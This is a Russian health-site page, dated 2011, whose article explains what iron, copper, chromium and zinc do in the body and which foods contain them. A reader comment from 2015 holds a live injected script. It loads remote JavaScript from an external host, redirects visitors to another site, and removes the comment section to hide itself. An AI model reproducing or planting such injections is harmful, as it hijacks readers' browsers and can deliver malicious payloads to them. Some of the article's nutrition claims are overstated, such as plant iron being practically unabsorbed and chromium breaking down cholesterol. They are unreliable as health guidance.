Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Металлы в нас: чем мы пох...  >>  Металлы в нас: чем мы похожи на Железного Дровосека?
 
Обратная связь
 

Металлы в нас: чем мы похожи на Железного Дровосека?

Размер шрифта
01 декабря 2011 07:11
  • google_analytics: false
  • Нравится

Железо, цинк, хром, медь: зачем они нам?

металлы

Железо

Зачем нам железо?


  1. Железо, которое поступает в организм вместе с пищей, используется для получения гемоглобина. В составе гемоглобина железо помогает обменивать углекислый газ на кислород, а в тканях – наоборот, отдавать клеткам атомы кислорода в обмен на вредный и ненужный углекислый газ. Если нет железа – нет гемоглобина, а значит, нашим тканям нечем дышать. Если продуктов, богатых железом, в рационе мало, в крови снижается уровень гемоглобина, ткани не обеспечиваются кислородом, развивается анемия.

  2. Железо входит в состав миоглобина – белка, который запасает атомы кислорода на случай непредвиденной нагрузки на мышцы. Многие ферменты, в том числе пищеварительные, содержат железо.

Источники железа


  1. Продукты, богатые железом – говядина и печень. Этот макроэлемент есть во фруктах и крупах, однако «растительное» железо практически не усваивается. Если хотите повысить уровень железа в организме, ешьте мясо. В сутки мужина должен получать не менее 10 мг элемента, а женщины не менее 20 мг (женская потребность выше из-за ежемесячных кровопотерь).

  2. Для всасывания железа необходим витамин С. Этим витамином богаты киви, шиповник, красный перец, цитрусовые, черная смородина, лук, томаты, листовые овощи.

Медь

Зачем нам медь?


  1. Медь участвует в синтезе коллагена. Этот белок – основа наших костей, мышц и кожи. Именно он обеспечивает эластичность кожи. С возрастом количество коллагена в коже уменьшается, она становится дряблой, покрывается морщинами. Если же меди не хватает в молодом возрасте, могут начаться преждевременные проблемы с кожей. Вместо того, чтобы бежать к косметологу, необходимо сдать анализы на микроэлементы.

  2. Медь способствует синтезу лейкоцитов, защитных клеток нашего организма. Недостаток меди приводит к снижению иммунитета.

Источники меди

Медь содержится в говяжьей печени, шпинате, гречневой крупе, фундуке.

Хром

Зачем нам хром?


  1. Хром входит в состав всех клеток организма.

  2. При недостатке хрома уровень сахара в крови повышается.

  3. Помогает организму расщеплять жиры и плохой холестерин, высокий уровень которого – главная причина атеросклероза.

Источники хрома

Свекла, редис, картофель, капуста, томаты, вишня, яблоки, сливы, виноград, черника, говяжья печень, рыба и яйца.

Цинк

Зачем нам цинк?


  1. Этот микроэлемент обеспечивает подвижность сперматозоидов. Если мужскому организму не хватает цинка, могут возникнуть проблемы с зачатием.

  2. Цинк борется с прыщами и регулирует деятельность сальных желез кожи, тем самым уменьшая воспаления.

Источники цинка

  1. По содержанию цинка на первом месте – устрицы. В 6 устрицах – суточная доза цинка.

  2. Этот важный микроэлемент есть и в других морепродуктах, а также в говядине, яйцах, орехах, бобовых, пшеничных отрубях и тыквенных семечках.

 

Сюжеты по теме
Металлы в нашем организме. Зачем они нам нужны

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Три лучших средства, которые вернут вашей коже молодость!   Орехи продлевают жизнь! Какие орехи есть?   Первый, второй, … пятый элемент   Что в воде, кроме воды?  

Слайдшоу

40+: как теперь есть? Все что нужно женщине. Часть 3
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.